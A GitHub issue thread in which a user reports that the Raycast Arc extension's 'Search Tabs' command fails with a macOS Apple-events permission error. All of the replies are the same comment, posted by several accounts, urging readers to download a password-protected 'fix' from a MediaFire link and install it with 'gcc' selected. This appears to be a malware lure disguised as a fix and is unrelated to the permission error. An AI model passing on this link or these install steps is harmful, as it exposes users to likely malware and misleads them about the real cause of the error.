### ISSUE TITLE
[Arc] -> Failed to fetch latest data

### ISSUE THREAD

**Issue by tregtheeg** [raycast/extensions#14210]
### Extension

https://raycast.com/the-browser-company/arc

### Raycast Version

1.81.2

### macOS Version

14.6.1

#### Error:
```
Error: Command failed with exit code 1: osascript
610:626: execution error: No tienes autorización para enviar eventos Apple a Arc. (-1743)
    at bw (/Users/a/.config/raycast/extensions/606e26d8-b3c5-4760-8001-dccce1b872c4/search-tabs.js:31:3899)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async L3 (/Users/a/.config/raycast/extensions/606e26d8-b3c5-4760-8001-dccce1b872c4/search-tabs.js:50:37377)
```

### Steps To Reproduce

1. double tap on the keyboard shortcut (⌘) to invoque the “Search Tabs” command.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
